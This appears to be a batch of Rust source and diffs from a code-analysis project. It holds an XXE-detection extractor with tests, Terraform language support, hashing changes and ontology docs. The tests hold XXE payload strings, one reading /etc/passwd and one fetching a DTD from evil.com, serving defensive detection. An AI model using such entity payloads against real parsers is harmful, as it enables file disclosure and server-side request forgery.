//! Detects patterns where XML parsers are used without disabling external entity
//! processing, which can lead to data exfiltration, SSRF, or denial of service.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};
/// Extractor for XXE vulnerabilities.
///
/// Detects patterns indicating potentially unsafe XML parsing:
/// - Python: lxml, xml.etree, xml.dom.minidom, xml.sax
/// - JavaScript: xml2js, libxmljs
/// - Go: encoding/xml
/// - Java-style patterns (polyglot detection)
/// - DTD entity declarations
pub struct XxeExtractor {
// Python patterns
python_lxml: Regex,
python_etree: Regex,
python_minidom: Regex,
python_sax: Regex,
// JavaScript patterns
js_xml2js: Regex,
js_libxmljs: Regex,
// Go patterns
go_xml: Regex,
// Java-style patterns
java_xxe: Regex,
// DTD entity declaration
entity_decl: Regex,
}
impl Default for XxeExtractor {
fn default() -> Self {
Self::new()
}
}
impl XxeExtractor {
/// Create a new XXE extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
pub fn new() -> Self {
Self {
// Python: lxml/etree parse
python_lxml: Regex::new(r#"(?:etree|lxml)\.(?:parse|fromstring|XML)\s*\("#)
.expect("valid regex"),
// Python: xml.etree.ElementTree
python_etree: Regex::new(
r#"(?:xml\.etree\.ElementTree|ET)\.(?:parse|fromstring|XMLParser)\s*\("#,
)
.expect("valid regex"),
// Python: xml.dom.minidom
python_minidom: Regex::new(r#"xml\.dom\.minidom\.(?:parse|parseString)\s*\("#)
.expect("valid regex"),
// Python: xml.sax
python_sax: Regex::new(r#"xml\.sax\.(?:parse|parseString|make_parser)\s*\("#)
.expect("valid regex"),
// JavaScript: xml2js
js_xml2js: Regex::new(r#"xml2js\.(?:parseString|Parser)\s*\("#).expect("valid regex"),
// JavaScript: libxmljs
js_libxmljs: Regex::new(r#"libxmljs\.parseXml\s*\("#).expect("valid regex"),
// Go: encoding/xml
go_xml: Regex::new(r#"xml\.(?:Unmarshal|NewDecoder)\s*\("#).expect("valid regex"),
// Java-style patterns (polyglot detection in config files, etc.)
java_xxe: Regex::new(
r#"(?:DocumentBuilder|SAXParser|XMLReader|TransformerFactory)(?:Factory)?\.new"#,
)
.expect("valid regex"),
// DTD entity declaration (dangerous in untrusted XML)
entity_decl: Regex::new(r#"<!ENTITY\s+(?:%\s+)?\w+\s+(?:SYSTEM|PUBLIC)"#)
.expect("valid regex"),
}
}
fn make_claim(
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
parser: &str,
confidence: f32,
description: &str,
) -> ExtractedClaim {
build_claim(
path_segments,
&["xml", "parsing"],
"parser_config",
ObjectValue::Text(parser.to_string()),
file,
line,
matched,
confidence,
description,
)
}
}
impl Extractor for XxeExtractor {
fn name(&self) -> &str {
"xxe"
}
fn languages(&self) -> &[Language] {
&[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
language: Language,
file: &str,
) -> Vec<ExtractedClaim> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
// Check for DTD entity declarations (high risk in any context)
if let Some(m) = self.entity_decl.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"dtd_entity",
0.95,
"DTD SYSTEM/PUBLIC entity declaration (XXE attack vector)",
));
}
match language {
Language::Python => {
// lxml/etree (can be safe with proper configuration)
if let Some(m) = self.python_lxml.find(line) {
// Lower confidence if defusedxml is imported or resolve_entities=False
let confidence = if content.contains("defusedxml")
|| line.contains("resolve_entities=False")
{
0.5
} else {
0.85
};
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"lxml",
confidence,
"lxml XML parsing may be vulnerable to XXE without proper config",
));
}
// xml.etree.ElementTree
if let Some(m) = self.python_etree.find(line) {
// Per the CPython documentation, ElementTree does not expand external
// entities; the remaining risk is entity-expansion DoS on older Expat
// builds, hence the lower confidence.
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"elementtree",
0.75,
"xml.etree.ElementTree on untrusted XML - review for entity-expansion DoS",
));
}
// xml.dom.minidom (leaves external entities unexpanded per the CPython docs,
// but shares the entity-expansion DoS exposure)
if let Some(m) = self.python_minidom.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"minidom",
0.85,
"xml.dom.minidom on untrusted XML - review for entity-expansion DoS",
));
}
// xml.sax (external general entities are off by default since Python 3.7.1;
// older interpreters need feature_external_ges disabled explicitly)
if let Some(m) = self.python_sax.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"sax",
0.85,
"xml.sax may process external entities unless feature_external_ges is disabled",
));
}
}
Language::JavaScript | Language::TypeScript => {
// xml2js (generally safer, but can be misconfigured)
if let Some(m) = self.js_xml2js.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"xml2js",
0.7,
"xml2js XML parsing - verify external entity settings",
));
}
// libxmljs (can be vulnerable)
if let Some(m) = self.js_libxmljs.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"libxmljs",
0.85,
"libxmljs may be vulnerable to XXE attacks",
));
}
}
Language::Go => {
// encoding/xml (safer by default, but DTD expansion can be issue)
if let Some(m) = self.go_xml.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"encoding_xml",
0.65,
"Go xml package - generally safe but verify with untrusted input",
));
}
}
_ => {}
}
// Check for Java patterns (polyglot detection)
if let Some(m) = self.java_xxe.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"java_parser",
0.9,
"Java XML parser - requires feature flags to prevent XXE",
));
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_python_lxml() {
let extractor = XxeExtractor::new();
let content = r#"
doc = etree.parse(xml_file)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("xml/parsing"));
}
#[test]
fn test_python_lxml_with_defusedxml() {
let extractor = XxeExtractor::new();
let content = r#"
import defusedxml.ElementTree as ET
doc = etree.parse(xml_file)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
// Should still detect but with lower confidence
assert_eq!(claims.len(), 1);
assert!(claims[0].confidence < 0.6);
}
#[test]
fn test_python_elementtree() {
let extractor = XxeExtractor::new();
let content = r#"
import xml.etree.ElementTree as ET
tree = ET.parse(source)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "xml.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_python_minidom() {
let extractor = XxeExtractor::new();
let content = r#"
from xml.dom.minidom import parse
doc = xml.dom.minidom.parse(xml_string)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("minidom"));
}
#[test]
fn test_python_sax() {
let extractor = XxeExtractor::new();
let content = r#"
xml.sax.parse(source, handler)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "handler.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_xml2js() {
let extractor = XxeExtractor::new();
let content = r#"
xml2js.parseString(xmlData, callback);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "parser.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_libxmljs() {
let extractor = XxeExtractor::new();
let content = r#"
const doc = libxmljs.parseXml(xmlString);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "parser.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_go_xml() {
let extractor = XxeExtractor::new();
let content = r#"
err := xml.Unmarshal(data, &result)
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "parser.go");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_java_parser() {
let extractor = XxeExtractor::new();
let content = r#"
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "mixed.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("Java"));
}
#[test]
fn test_dtd_entity() {
let extractor = XxeExtractor::new();
let content = r#"
<!ENTITY xxe SYSTEM "file:///etc/passwd">
"#;
// Use a non-test filename to avoid confidence reduction
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "parser.xml");
assert_eq!(claims.len(), 1);
assert!(claims[0].confidence >= 0.9);
assert!(claims[0].description.contains("XXE attack vector"));
}
#[test]
fn test_dtd_public_entity() {
let extractor = XxeExtractor::new();
let content = r#"
<!ENTITY % remote PUBLIC "http://evil.com/evil.dtd">
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "test.xml");
assert_eq!(claims.len(), 1);
}
}


@ -61,6 +61,7 @@ pub fn language_to_prefix(language: Language) -> &'static str {
Language::GoMod => "gomod",
Language::NpmManifest => "npm",
Language::PythonManifest => "python",
Language::Terraform => "terraform",
Language::Unknown => "unknown",
}
}
@ -84,6 +85,7 @@ pub fn language_to_name(language: Language) -> &'static str {
Language::GoMod => "Go module",
Language::NpmManifest => "NPM manifest",
Language::PythonManifest => "Python manifest",
Language::Terraform => "Terraform",
Language::Unknown => "Unknown",
}
}
@ -107,6 +109,7 @@ pub fn language_to_extension(language: Language) -> &'static str {
Language::GoMod => "go",
Language::NpmManifest => "json",
Language::PythonManifest => "toml",
Language::Terraform => "hcl",
Language::Unknown => "",
}
}


@ -244,6 +244,7 @@ fn language_to_string(lang: Language) -> String {
Language::GoMod => "gomod",
Language::NpmManifest => "npm",
Language::PythonManifest => "pip",
Language::Terraform => "terraform",
Language::Unknown => "unknown",
}
.to_string()


@ -34,6 +34,8 @@ pub enum Language {
Dotenv,
/// Docker files.
Docker,
/// Terraform files.
Terraform,
/// Cargo manifest.
CargoManifest,
/// Go module file.
@ -62,6 +64,7 @@ impl fmt::Display for Language {
Language::Ini => "ini",
Language::Dotenv => "dotenv",
Language::Docker => "docker",
Language::Terraform => "terraform",
Language::CargoManifest => "cargo",
Language::GoMod => "gomod",
Language::NpmManifest => "npm",
@ -90,6 +93,7 @@ impl FromStr for Language {
"ini" => Ok(Language::Ini),
"dotenv" | "env" => Ok(Language::Dotenv),
"docker" | "dockerfile" => Ok(Language::Docker),
"terraform" | "tf" => Ok(Language::Terraform),
"cargo" | "cargo.toml" => Ok(Language::CargoManifest),
"gomod" | "go.mod" => Ok(Language::GoMod),
"npm" | "package.json" => Ok(Language::NpmManifest),
@ -153,6 +157,7 @@ impl Language {
"toml" => Language::Toml,
"json" => Language::Json,
"ini" => Language::Ini,
"tf" => Language::Terraform,
_ => Language::Unknown,
}
}
@ -174,6 +179,8 @@ mod tests {
assert_eq!(Language::from_path(Path::new("go.mod")), Language::GoMod);
assert_eq!(Language::from_path(Path::new(".env.production")), Language::Dotenv);
assert_eq!(Language::from_path(Path::new("Dockerfile")), Language::Docker);
assert_eq!(Language::from_path(Path::new("main.tf")), Language::Terraform);
assert_eq!(Language::from_path(Path::new("variables.tf")), Language::Terraform);
}
#[test]
@ -201,6 +208,8 @@ mod tests {
assert_eq!(Language::from_str("gomod").unwrap(), Language::GoMod);
assert_eq!(Language::from_str("npm").unwrap(), Language::NpmManifest);
assert_eq!(Language::from_str("pip").unwrap(), Language::PythonManifest);
assert_eq!(Language::from_str("terraform").unwrap(), Language::Terraform);
assert_eq!(Language::from_str("tf").unwrap(), Language::Terraform);
}
#[test]


@ -24,7 +24,7 @@ pub use verdict::Verdict;
/// # Example
///
/// ```
/// use aphoria::types::PredicateAliasSet;
/// use aphoria::PredicateAliasSet;
///
/// let aliases = PredicateAliasSet::new("enabled", vec!["required", "mandatory"]);
/// assert!(aliases.contains("enabled"));


@ -37,7 +37,11 @@ impl PathMapper {
Language::JavaScript | Language::NpmManifest => "javascript",
Language::Cpp => "cpp",
Language::Ini => "config",
Language::Yaml | Language::Toml | Language::Json | Language::Dotenv => "config",
Language::Yaml
| Language::Toml
| Language::Json
| Language::Dotenv
| Language::Terraform => "config",
Language::Docker => "docker",
Language::Unknown => "unknown",
};


@ -60,7 +60,13 @@ pub fn compute_content_hash_v2(assertion: &Assertion) -> [u8; 32] {
}
ObjectValue::Number(n) => {
hasher.update(b"N:");
hasher.update(&n.to_le_bytes());
// Hash the number as a fixed-precision decimal string instead of raw f64 bytes.
// A JSON round-trip can change the exact f64 bit pattern of values that are not
// exactly representable in decimal, which would change a byte-level hash.
// Formatting to 10 decimal places survives the decimal→binary→decimal
// conversion in JSON parsing. The trade-off is that values differing only
// beyond the 10th decimal place hash identically.
let s = format!("{:.10}", n);
hasher.update(s.as_bytes());
}
ObjectValue::Boolean(b) => {
hasher.update(b"B:");
@ -79,8 +85,11 @@ pub fn compute_content_hash_v2(assertion: &Assertion) -> [u8; 32] {
hasher.update(&(assertion.source_class as u8).to_le_bytes());
// Confidence and timestamp
// Use string format for confidence (f32) to survive JSON round-trips.
// f32 has ~7 significant decimal digits, so 6 decimal places is sufficient.
hasher.update(b":");
hasher.update(&assertion.confidence.to_le_bytes());
let confidence_str = format!("{:.6}", assertion.confidence);
hasher.update(confidence_str.as_bytes());
hasher.update(b":");
hasher.update(&assertion.timestamp.to_le_bytes());


@ -1,7 +1,5 @@
//! Record processing methods for the IngestWorker.
//!
//! Contains methods for ingesting assertions, votes, and epochs,
//! including validation and signature verification.
//! Record processing methods for the IngestWorker. Ingests assertions, votes,
//! and epochs with validation and signature verification.
use super::record_types::RECORD_HEADER_SIZE;
use super::{IngestWorker, RecordType};
@ -327,12 +325,20 @@ impl<S: KVStore + 'static> IngestWorker<S> {
// The hash covers: subject, predicate, object, source_hash, source_class, confidence, timestamp.
let v2_content_hash: Option<[u8; 32]> =
if assertion.signatures.iter().any(|s| s.version == 2) {
// Debug: show exact number format for comparison with signing
let object_str = match &assertion.object {
stemedb_core::types::ObjectValue::Number(n) => format!("Number({:.17})", n),
other => format!("{:?}", other),
};
let confidence_str = format!("{:.17}", assertion.confidence);
let hash = compute_content_hash_v2(assertion);
debug!(
subject = %assertion.subject,
predicate = %assertion.predicate,
object = %object_str,
source_hash = %hex::encode(assertion.source_hash),
source_class = ?assertion.source_class,
confidence = %assertion.confidence,
confidence = %confidence_str,
timestamp = %assertion.timestamp,
content_hash = %hex::encode(hash),
"Computed v2 content hash for verification"


@ -0,0 +1,177 @@
# stemedb-ontology
Domain ontology layer for Episteme. It defines how subjects are structured based on predicate type and domain, so that assertions from different sources about the same thing land on the same subject and their conflicts can be detected.
## Module Overview
| Module | Purpose |
|--------|---------|
| `domain.rs` | Domain, EntityType, PredicateSchema, SourceTier builders |
| `subject.rs` | SubjectBuilder for canonical subject construction |
| `validator.rs` | Validates assertions against domain rules |
| `client.rs` | HTTP client for StemeDB API |
| `dto/` | Request/response DTOs for API communication |
| `pharma/` | Pharmaceutical domain (reference implementation) |
## Quick Start
### CLI Usage (steme-pharma)
```bash
# Build the CLI
cargo build --release -p stemedb-ontology
# Ingest FDA label data
./target/release/steme-pharma ingest semaglutide,tirzepatide
# Ingest with mock conflicts for testing
./target/release/steme-pharma ingest semaglutide --with-conflicts
# Query conflicts (Skeptic lens - default)
./target/release/steme-pharma query "Semaglutide:Type2Diabetes" hba1c_reduction_percent
# Query with source hierarchy (Layered Consensus)
./target/release/steme-pharma query "Semaglutide:Type2Diabetes" weight_loss_percent --mode layered
# Compare two drugs
./target/release/steme-pharma compare \
"Semaglutide:Type2Diabetes" \
"Tirzepatide:Type2Diabetes" \
--predicate hba1c_reduction_percent
# Explore available predicates for a subject
./target/release/steme-pharma explore "Semaglutide:Type2Diabetes"
# Validate a subject/predicate combination
./target/release/steme-pharma validate "Semaglutide:Type2Diabetes" hba1c_reduction_percent
# JSON output (for scripting)
./target/release/steme-pharma --format json query "Semaglutide" nausea_rate
```
### Programmatic Usage
```rust
use std::collections::HashMap;
use ed25519_dalek::SigningKey;
use rand::rngs::OsRng;
use stemedb_ontology::client::StemeClient;
use stemedb_ontology::pharma::extractors::{FdaLabelExtractor, MedicalExtractor, SourceInput};
use stemedb_ontology::{pharma, SubjectBuilder, Validator};
// The extractor and client calls are async, so the example runs inside an async
// `main`. The Tokio runtime and the boxed error type are assumptions; use
// whatever runtime and error type your application already has.
#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
    // Load the pharma domain definition
    let domain = pharma::definition();
    // Build a subject using the ontology
    let schema = domain.get_schema("efficacy").unwrap();
    let mut entities = HashMap::new();
    entities.insert("Drug".to_string(), "Semaglutide".to_string());
    entities.insert("Indication".to_string(), "Type2Diabetes".to_string());
    let subject = SubjectBuilder::build(schema, &entities, &domain).unwrap();
    assert_eq!(subject, "Semaglutide:Type2Diabetes");
    // Validate assertions
    let validator = Validator::new(&domain);
    let result = validator.validate("hba1c_reduction_percent", &subject, 0.95);
    assert!(result.is_ok());
    // Extract and ingest claims
    let client = StemeClient::new("http://localhost:18180");
    let extractor = FdaLabelExtractor::new();
    let signing_key = SigningKey::generate(&mut OsRng);
    let agent_id = signing_key.verifying_key().to_bytes();
    let hlc = uhlc::HLCBuilder::new().build();
    let claims = extractor.extract(&SourceInput::DrugName("semaglutide".into())).await?;
    for claim in claims {
        let assertion = claim.to_assertion(&signing_key, agent_id, &hlc);
        let hash = client.assert(&assertion).await?;
        println!("Ingested: {}", hash);
    }
    // Query for conflicts
    let skeptic = client.skeptic("Semaglutide:Type2Diabetes", "hba1c_reduction_percent").await?;
    println!("Conflict score: {}", skeptic.conflict_score);
    Ok(())
}
```
## Architecture
```
                  ┌─────────────────────────────────────┐
                  │          Domain Definition          │
                  │  (EntityTypes, Schemas, Hierarchy)  │
                  └──────────────┬──────────────────────┘
         ┌───────────────────────┼───────────────────────┐
         │                       │                       │
         v                       v                       v
┌─────────────────┐    ┌──────────────────┐    ┌──────────────────┐
│ SubjectBuilder  │    │    Validator     │    │ MedicalExtractor │
│                 │    │                  │    │     (trait)      │
│ Build canonical │    │ Validate against │    │ Extract claims   │
│ subject strings │    │ domain rules     │    │ from sources     │
└────────┬────────┘    └─────────┬────────┘    └─────────┬────────┘
         │                       │                       │
         └───────────────────────┼───────────────────────┘
                                 v
                       ┌───────────────────┐
                       │    StemeClient    │
                       │                   │
                       │ Submit assertions │
                       │ Query with lenses │
                       └─────────┬─────────┘
                                 v
                       ┌───────────────────┐
                       │    StemeDB API    │
                       │    :18180/v1/*    │
                       └───────────────────┘
```
## Subject Patterns
Different predicate categories use different subject structures, so that claims about the same thing share a subject and collide while unrelated claims do not:
| Category | Pattern | Example | Use Case |
|----------|---------|---------|----------|
| Efficacy | `{Drug}:{Indication}` | `Semaglutide:Type2Diabetes` | Outcome measures for specific conditions |
| Safety | `{Drug}` | `Semaglutide` | Adverse events (apply across indications) |
| Mechanism | `{Drug}:{Target}` | `Semaglutide:GLP1R` | Pharmacology details |
| Comparison | `{Drug}:{Comparator}:{Indication}` | `Semaglutide:Tirzepatide:Type2Diabetes` | Head-to-head trials |
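To make the patterns concrete, here is a minimal sketch of placeholder substitution. It is not the crate's `SubjectBuilder`: `build_subject` is a hypothetical helper, and it assumes every pattern is a `:`-separated list of `{Entity}` placeholders, as in the table above.

```rust
use std::collections::HashMap;

/// Hypothetical helper (not part of stemedb-ontology): fill `{Entity}`
/// placeholders in a subject pattern from a map of entity values.
fn build_subject(pattern: &str, entities: &HashMap<&str, &str>) -> Result<String, String> {
    let mut parts = Vec::new();
    for segment in pattern.split(':') {
        // Each segment is expected to look like `{Drug}`.
        let name = segment
            .strip_prefix('{')
            .and_then(|s| s.strip_suffix('}'))
            .ok_or_else(|| format!("malformed segment: {segment}"))?;
        // A pattern can only be filled if every entity it names is supplied.
        let value = entities
            .get(name)
            .ok_or_else(|| format!("missing entity: {name}"))?;
        parts.push(*value);
    }
    Ok(parts.join(":"))
}
```

With `Drug` and `Indication` supplied, the Efficacy pattern yields `Semaglutide:Type2Diabetes`, while the Mechanism pattern fails because no `Target` is present.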
## Source Hierarchy
Claims are weighted by source authority:
| Tier | Source Class | Weight | Examples |
|------|--------------|--------|----------|
| 0 | Regulatory | 1.0 | FDA Labels, EMA Reports |
| 1 | Clinical | 0.9 | Phase III RCTs, Lancet, NEJM |
| 2 | Observational | 0.7 | Real-World Evidence, FAERS |
| 3 | Expert | 0.5 | Guidelines, ADA Standards |
| 4 | Community | 0.3 | PatientsLikeMe, Moderated Forums |
| 5 | Anecdotal | 0.1 | Reddit, Twitter, Blog Posts |
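One way to picture what the weights do is a weighted mean over numeric claims. The sketch below is only an illustration under that assumption; the actual lens resolution happens in StemeDB and may combine claims differently, and `weighted_mean` is a hypothetical name.

```rust
/// Hypothetical illustration: combine numeric claims as a weighted mean.
/// Each tuple is `(claimed_value, source_tier_weight)`.
fn weighted_mean(claims: &[(f64, f64)]) -> Option<f64> {
    let total_weight: f64 = claims.iter().map(|(_, w)| w).sum();
    if total_weight <= 0.0 {
        return None; // no claims, or every weight is zero
    }
    let weighted_sum: f64 = claims.iter().map(|(v, w)| v * w).sum();
    Some(weighted_sum / total_weight)
}
```

With made-up values, a Regulatory claim of `20.0` (weight 1.0) and an Anecdotal claim of `44.0` (weight 0.1) resolve much closer to the Regulatory figure than to the midpoint.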
## Adding a New Domain
See [Adding a Domain Guide](../../docs/guides/adding-a-domain.md) for step-by-step instructions on implementing new domains (e.g., cardiology, finance).
## Testing
```bash
# Run all ontology tests
cargo test -p stemedb-ontology
# Run with output
cargo test -p stemedb-ontology -- --nocapture
# Consumer Health UAT
cargo test -p stemedb-ontology --test consumer_health_uat
```
## Related Documentation
- [What is Episteme](../../what-is-episteme.md)
- [Architecture](../../architecture.md)
- [Vision](../../vision.md)
- [Consumer Health Use Case](../../docs/app-concepts/consumer-health.md)


@ -40,21 +40,26 @@ pub async fn run_ingest(
// Extract and ingest FDA claims
if !args.mock_only {
let extractor = FdaLabelExtractor::new();
+let drugs: Vec<&str> = args.drugs.split(',').map(str::trim).collect();
+let total_drugs = drugs.len();
-for drug in args.drugs.split(',') {
-let drug = drug.trim();
-println!("--- Ingesting {} (FDA) ---", drug);
+for (drug_idx, drug) in drugs.iter().enumerate() {
+println!("--- [{}/{}] Ingesting {} (FDA) ---", drug_idx + 1, total_drugs, drug);
-match extractor.extract(&SourceInput::DrugName(drug.to_string())).await {
+match extractor.extract(&SourceInput::DrugName((*drug).to_string())).await {
Ok(claims) => {
-info!(drug = drug, claims_count = claims.len(), "Extracted FDA claims");
-for claim in claims {
+let claims_count = claims.len();
+info!(drug = drug, claims_count = claims_count, "Extracted FDA claims");
+for (claim_idx, claim) in claims.iter().enumerate() {
let assertion = claim.to_assertion(&signing_key, agent_id, &hlc);
match client.assert(&assertion).await {
Ok(hash) => {
total_ingested += 1;
println!(
-" [Regulatory] {} = {} -> {}...",
+" [{}/{}] [Regulatory] {} = {} -> {}...",
+claim_idx + 1,
+claims_count,
claim.predicate,
format_value(&claim.value),
&hash[..16]
@ -63,7 +68,13 @@ pub async fn run_ingest(
Err(e) => {
total_errors += 1;
warn!(error = %e, predicate = %claim.predicate, "Failed to ingest");
-println!(" [ERROR] {} -> {}", claim.predicate, e);
+println!(
+" [{}/{}] [ERROR] {} -> {}",
+claim_idx + 1,
+claims_count,
+claim.predicate,
+e
+);
}
}
}


@ -105,7 +105,13 @@ impl StemeClient {
let response = self.http_client.post(&url).json(&request).send().await.map_err(|e| {
if e.is_connect() {
-ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
+ClientError::ServerUnavailable {
+url: url.clone(),
+message: format!(
+"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
+e
+),
+}
} else {
ClientError::Http(e)
}
@ -170,7 +176,13 @@ impl StemeClient {
let response = self.http_client.get(&url).send().await.map_err(|e| {
if e.is_connect() {
-ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
+ClientError::ServerUnavailable {
+url: url.clone(),
+message: format!(
+"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
+e
+),
+}
} else {
ClientError::Http(e)
}
@ -223,7 +235,13 @@ impl StemeClient {
let response = self.http_client.get(&url).send().await.map_err(|e| {
if e.is_connect() {
-ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
+ClientError::ServerUnavailable {
+url: url.clone(),
+message: format!(
+"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
+e
+),
+}
} else {
ClientError::Http(e)
}
@ -286,7 +304,13 @@ impl StemeClient {
let response = self.http_client.get(&url).send().await.map_err(|e| {
if e.is_connect() {
-ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
+ClientError::ServerUnavailable {
+url: url.clone(),
+message: format!(
+"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
+e
+),
+}
} else {
ClientError::Http(e)
}
@ -329,7 +353,13 @@ impl StemeClient {
let response = self.http_client.get(&url).send().await.map_err(|e| {
if e.is_connect() {
-ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
+ClientError::ServerUnavailable {
+url: url.clone(),
+message: format!(
+"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
+e
+),
+}
} else {
ClientError::Http(e)
}


@ -92,6 +92,12 @@ impl Journal {
})?;
guard.write(&buf)?;
+// Update the cached segment size to reflect the write.
+// This ensures read() can use the cached size for bounds checking.
+let new_file_size =
+guard.file().metadata().map_err(|e| QuarantineError::io(guard.path(), e))?.len();
+self.segment_mgr.update_current_segment_size(new_file_size);
let offset = self.current_offset;
self.current_offset += record.disk_size();


@ -147,6 +147,17 @@ impl SegmentManager {
current_segment_size >= self.max_segment_size
}
+/// Update the cached size of the current (latest) segment.
+///
+/// Call this after appending data to keep the cached size in sync with
+/// the actual file size. This ensures that `read()` operations can use
+/// the cached size for bounds checking without a disk stat call.
+pub fn update_current_segment_size(&mut self, new_size: u64) {
+if let Some(segment) = self.segments.last_mut() {
+segment.size = new_size;
+}
+}
/// Create a new segment with the given base offset.
///
/// Writes a v2 FileHeader to the new file and adds it to the segment list.


@ -0,0 +1,590 @@
# Adding a New Domain to stemedb-ontology
This guide walks you through implementing a new domain (vertical) in the stemedb-ontology crate. By the end, you'll have a working domain with entity types, predicate schemas, and optional extractors.
**Time:** ~30 minutes
**Prerequisites:** Rust knowledge, familiarity with StemeDB concepts
## Overview
A domain in stemedb-ontology defines:
1. **Entity Types** - The kinds of things in your domain (e.g., Drug, Company, Asset)
2. **Predicate Schemas** - How subjects are built for different predicate categories
3. **Source Hierarchy** - How to weight different source authorities
4. **Extractors (optional)** - Code that extracts claims from external sources
## Step 1: Plan Your Domain Model
Before writing code, answer these questions:
### What entities exist in your domain?
| Entity | Description | Example Values |
|--------|-------------|----------------|
| ? | ? | ? |
**Pharma example:**
| Entity | Description | Example Values |
|--------|-------------|----------------|
| Drug | Pharmaceutical compound | Semaglutide, Tirzepatide |
| Indication | Medical condition | Type2Diabetes, Obesity |
| Target | Molecular target | GLP1R, GIPR |
### What predicates will you track?
Group predicates by category; the category determines the subject pattern:
| Category | Subject Pattern | Example Predicates |
|----------|-----------------|-------------------|
| ? | ? | ? |
**Pharma example:**
| Category | Subject Pattern | Example Predicates |
|----------|-----------------|-------------------|
| Efficacy | `{Drug}:{Indication}` | hba1c_reduction_percent, weight_loss_percent |
| Safety | `{Drug}` | nausea_rate, has_boxed_warning |
| Mechanism | `{Drug}:{Target}` | binding_affinity, mechanism_of_action |
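The grouping matters because a predicate is resolved to its category, and the category fixes the subject pattern. A minimal sketch of that lookup, using the pharma rows above, might look like this. `Schema`, `pharma_schemas`, and `find_schema` are hypothetical stand-ins, not the crate's `PredicateSchema` or `schema_for_predicate()`.

```rust
/// Hypothetical stand-in for a predicate schema.
struct Schema {
    category: &'static str,
    subject_pattern: &'static str,
    predicates: &'static [&'static str],
}

/// The pharma categories from the table above, written out as data.
fn pharma_schemas() -> Vec<Schema> {
    vec![
        Schema {
            category: "efficacy",
            subject_pattern: "{Drug}:{Indication}",
            predicates: &["hba1c_reduction_percent", "weight_loss_percent"],
        },
        Schema {
            category: "safety",
            subject_pattern: "{Drug}",
            predicates: &["nausea_rate", "has_boxed_warning"],
        },
        Schema {
            category: "mechanism",
            subject_pattern: "{Drug}:{Target}",
            predicates: &["binding_affinity", "mechanism_of_action"],
        },
    ]
}

/// Return the first schema that lists the given predicate, if any.
fn find_schema<'a>(schemas: &'a [Schema], predicate: &str) -> Option<&'a Schema> {
    schemas
        .iter()
        .find(|schema| schema.predicates.iter().any(|p| *p == predicate))
}
```

A predicate that appears in no category returns `None`, which corresponds to the "Unknown predicate" situation described under Troubleshooting.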
### What sources will provide data?
Order from most to least authoritative:
| Tier | Source Class | Examples | Weight |
|------|--------------|----------|--------|
| 0 | Regulatory | ? | 1.0 |
| 1 | Clinical | ? | 0.9 |
| ... | ... | ... | ... |
## Step 2: Create Domain Module
Create the directory structure:
```
crates/stemedb-ontology/src/
  {domain}/
    mod.rs           # Re-exports
    definition.rs    # Domain::new() builder
```
### Template: `{domain}/mod.rs`
```rust
//! {Domain} domain ontology.
//!
//! This module defines the {domain} vertical with:
//! - Entity types (...)
//! - Predicate schemas (...)
//! - Source hierarchy (...)
pub mod definition;
pub use definition::definition;
// Re-export domain-specific types if any
// pub use definition::{...};
```
### Template: `{domain}/definition.rs`
```rust
//! Compiled-in {domain} domain definition.
use crate::domain::{
DefaultLens, Domain, EntityType, NamingConvention, PredicateSchema, SourceTier,
};
use stemedb_core::types::SourceClass;
/// Build the {domain} domain definition.
pub fn definition() -> Domain {
let mut domain = Domain::new(
"{Domain}",
"Description of what this domain covers",
);
// -------------------------------------------------------------------------
// Entity Types
// -------------------------------------------------------------------------
